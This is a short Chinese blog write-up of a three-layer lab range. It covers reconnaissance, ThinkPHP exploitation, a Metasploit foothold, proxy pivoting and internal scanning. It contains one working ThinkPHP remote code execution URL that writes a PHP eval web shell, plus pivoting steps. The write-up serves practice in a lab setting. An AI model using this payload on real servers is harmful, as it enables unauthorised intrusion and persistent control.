三层cfs

简介

这个只是为了深刻记录代理原理,所以尝试再做一次。

并且全程只使用msf 的代理

重点就是,多个路由,一个代理
通过这一个代理,就可以访问多层内网,但是必须在对应的metepreter 设置路由,可以直接为路由表,然后进行转发

信息收集

  1. ip 查询

    image-20240303120048023

  2. 端口扫描

    image-20240303120129841

  3. 网站信息收集

    访问

    image-20240303120225366

    路径

    image-20240303120335711

    image-20240303120355346

    找到一个flag?

    image-20240303120425438

    查看版本

    存在nginx

web渗透

  1. 利用thinkphp

    1
    /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST[cmd]);?>

    image-20240303120827913

    写入成功

    image-20240303120906635

    image-20240303120940227

  2. 信息收集

    image-20240303121008549

    image-20240303121029925

    发现是linux x64平台

  3. 上线msf

    上传payload

    image-20240303121120967

    image-20240303121341776

  4. 开启代理

    image-20240303121529560

    image-20240303121612977

    image-20240303121719845

    image-20240303121904100

    注意版本

    测试

    image-20240303131544598

    代理成功

内网信息收集

  1. fscan

    image-20240303131642050
    image-20240303131741192

    发现还存在192.168.22.22

横向移动

192.168.22.22

  1. 尝试访问

    image-20240303131929395

  2. 给浏览器开启代理

    image-20240303133003018

    image-20240303132954770

  3. 尝试sql注入

    image-20240303132137103

    用不了一点…..

#靶场记录
三层cfs
https://tsy244.github.io/2024/03/03/靶场记录/三层cfs/
Author
August Rosenberg
Posted on
March 3, 2024
Licensed under